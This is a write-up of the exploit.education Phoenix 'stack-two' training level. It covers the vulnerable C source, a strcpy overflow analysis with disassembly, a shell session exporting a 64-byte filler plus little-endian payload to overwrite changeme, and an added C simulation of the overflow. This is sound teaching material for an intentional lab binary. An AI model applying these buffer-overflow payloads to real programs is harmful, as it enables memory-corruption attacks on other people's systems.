1. Intro
2. Code and analysis
2.1. C code
/*
 * phoenix/stack-two, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * If you're Russian to get to the bath room, and you are Finnish when you get
 * out, what are you when you are in the bath room?
 *
 * European!
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;
  char *ptr;

  printf("%s\n", BANNER);

  ptr = getenv("ExploitEducation");
  if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, ptr);

  if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
        locals.changeme);
  }

  exit(0);
}
2.2. Analysis
The program reads the ExploitEducation environment variable into ptr and copies it into locals.buffer with strcpy.
The goal is to make locals.changeme, which sits right after buffer in the struct, equal 0x0d0a090a.
3. Confirming the vulnerability and preparing the attack
3.1. Vulnerability
strcpy performs no length check, so an environment variable longer than 64 bytes overwrites past buffer into changeme.
3.2. Preparation
Check the locations of buffer and changeme (it will be much the same as the previous level...), then place the payload into the environment variable with export. In the disassembly below, buffer is the strcpy destination at -0x50(%rbp) and changeme is read from -0x10(%rbp), so changeme starts exactly 0x40 = 64 bytes into buffer, with no padding between them. Because amd64 is little-endian, 0x0d0a090a has to be written as the bytes 0a 09 0a 0d; none of them is 0x00, which matters because strcpy would stop at the first NUL.
...
0x00000000004006f6 <+73>: mov -0x8(%rbp),%rdx
0x00000000004006fa <+77>: lea -0x50(%rbp),%rax
0x00000000004006fe <+81>: mov %rdx,%rsi
0x0000000000400701 <+84>: mov %rax,%rdi
0x0000000000400704 <+87>: callq 0x4004d0 <strcpy@plt>
0x0000000000400709 <+92>: mov -0x10(%rbp),%eax
0x000000000040070c <+95>: cmp $0xd0a090a,%eax
...
4. Exploit
root@phoenix-amd64:/opt/phoenix/amd64# export ExploitEducation=`python -c 'print "A"*0x40+"\x0a\x09\x0a\x0d"'`
root@phoenix-amd64:/opt/phoenix/amd64# export
declare -x ExploitEducation="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
"
declare -x HOME="/root"
...
root@phoenix-amd64:/opt/phoenix/amd64# ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
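The following is an added example, not part of the original write-up or of the exploit.education sources. It models the same 64-byte buffer followed by changeme, builds the payload the way the export command above does (64 filler bytes, then the target in little-endian order), and mirrors strcpy's copy-until-NUL behaviour over the frame to confirm where the value and the terminating NUL land. The struct name, the union used for byte-level inspection and the function names are the example's own.

```c
/* Added example (not from the original write-up): model the stack-two frame
 * and the strcpy overflow that rewrites changeme. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TARGET 0x0d0a090aU

/* Same layout as the challenge's `locals`: the disassembly shows buffer at
 * rbp-0x50 and changeme at rbp-0x10, i.e. changeme at offset 0x40 (64). */
struct locals {
    char buffer[64];
    volatile int changeme;
};

/* A frame we can inspect byte by byte. The extra bytes stand in for the
 * stack beyond changeme, where strcpy's terminating NUL will land. */
union frame {
    struct locals l;
    unsigned char raw[sizeof(struct locals) + 16];
};

/* Build the payload: filler up to changeme, then `value` in the byte order
 * the CPU stores it (little-endian on amd64). Returns the payload length
 * (excluding the NUL), or 0 if `value` contains a zero byte, which strcpy
 * would treat as the end of the string and so never deliver. */
size_t build_payload(uint32_t value, unsigned char *out, size_t cap) {
    size_t off = offsetof(struct locals, changeme);   /* 64 */
    if (cap < off + 4 + 1) return 0;
    memset(out, 'A', off);
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(value >> (8 * i));
        if (b == 0) return 0;        /* embedded NUL: copy would truncate */
        out[off + i] = b;
    }
    out[off + 4] = '\0';
    return off + 4;
}

/* Mirror what strcpy(locals.buffer, ptr) does: copy bytes up to and
 * including the NUL with no bounds check, then report changeme and where
 * the terminator ended up. */
uint32_t run_overflow(const unsigned char *payload, size_t *nul_offset) {
    union frame f;
    memset(f.raw, 0, sizeof f.raw);
    size_t i = 0;
    do {
        f.raw[i] = payload[i];
    } while (payload[i++] != '\0');
    if (nul_offset) *nul_offset = i - 1;
    uint32_t v;
    memcpy(&v, f.raw + offsetof(struct locals, changeme), sizeof v);
    return v;
}

int main(void) {
    unsigned char payload[128];
    size_t nul;
    size_t n = build_payload(TARGET, payload, sizeof payload);
    uint32_t got = run_overflow(payload, &nul);
    printf("payload: %zu bytes, NUL lands at offset %zu (changeme is bytes 64..67)\n",
           n, nul);
    printf("changeme = 0x%08x (%s)\n", got, got == TARGET ? "match" : "mismatch");
    /* A target containing a zero byte cannot be delivered through strcpy: */
    printf("0x0d0a0900 deliverable: %s\n",
           build_payload(0x0d0a0900U, payload, sizeof payload) ? "yes" : "no");
    return 0;
}
```

The 68-byte payload is the same "A"*0x40 + "\x0a\x09\x0a\x0d" the export command produced; the NUL that strcpy appends lands at offset 68, just past changeme, which is why the write is harmless to the comparison. The Python 2 print adds a trailing newline, but the backticks strip it before the value reaches the environment.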